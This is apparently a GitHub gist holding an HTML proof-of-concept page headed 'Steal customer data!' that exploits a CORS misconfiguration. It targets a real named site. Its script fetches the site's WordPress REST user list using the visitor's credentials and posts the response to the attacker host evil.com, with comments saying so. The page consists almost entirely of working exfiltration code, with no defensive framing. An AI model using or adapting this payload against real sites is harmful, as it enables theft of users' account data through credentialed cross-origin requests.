Created
June 13, 2020 12:34
-
-
Save andripwn/631549458828e3c78cb98ada9f80b179 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE html> | |
| <html> | |
| <body> | |
| <center> | |
| <h3>Steal customer data!</h3> | |
| <html> | |
| <body> | |
| <button type='button' onclick='cors()'>Exploit</button> | |
| <p id='demo'></p> | |
| <script> | |
| function cors() { | |
| var xhttp = new XMLHttpRequest(); | |
| xhttp.onreadystatechange = function() { | |
| if (this.readyState == 4 && this.status == 200) { | |
| var a = this.responseText; // Sensitive data from datacommcloud.co.id about user account | |
| document.getElementById("demo").innerHTML = a; | |
| xhttp.open("POST", "http://evil.com", true);// Sending that data to Attacker's website | |
| xhttp.withCredentials = true; | |
| console.log(a); | |
| xhttp.send("data="+a); | |
| } | |
| }; | |
| xhttp.open("GET", "https://datacommcloud.co.id/wp-json/wp/v2/users/", true); | |
| xhttp.withCredentials = true; | |
| xhttp.send(); | |
| } | |
| </script> | |
| </body> | |
| </html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment